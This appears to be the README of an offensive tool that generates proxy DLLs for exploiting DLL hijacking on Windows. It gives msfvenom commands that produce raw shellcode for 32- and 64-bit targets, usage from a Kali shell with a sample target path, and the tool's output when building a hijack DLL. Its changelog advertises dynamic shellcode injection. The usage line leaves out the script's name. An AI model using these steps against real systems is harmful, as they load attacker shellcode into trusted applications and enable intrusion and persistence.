Tool for creating forwarding DLL for exploiting DLL hijacking vulnerability.
- Mingw-64 installed.
- Python 3.
- PEfile library.
- Colorama and Termcolor libraries.
Create shellcode with msfvenom and save it as a binary file.
msfvenom -p windows/x64/exec cmd=cmd.exe -f raw -o shellcode.bin -b "\x00" # FOR 64bit msfvenom -p windows/exec cmd=cmd.exe -f raw -o shellcode.bin -b "\x00" # FOR 32bit
Run the script with appropriate arguments.
kali@kali:~/proxyjacker$ python3 <DLL File Location> <Path to shellcode binary file> [Optional: Location for real DLL] Example: kali@kali:~/proxyjacker$ python3 version.dll shellcode.bin "C:/Program Files (x86)/Testingapp/" Output: Proxy DLL Creator For DLL Hijacking By Rikunj Sindhwad [Mr.R0b07] [*] GCC is installed and available. [*] DLL is 32bit [*] Definition File Created with name of export.def [*] Created 32bit DLL: version_proxy.dll kali@kali:~/proxyjacker$
- Initial version.
- Added custom path to redirect.
- Added dynamic shellcode injection from binary file.
- Added GCC check to ensure availability before compilation.
For upgrade requests, connect with me on Telegram.
Credits to Pentester Academy for teaching such great stuff.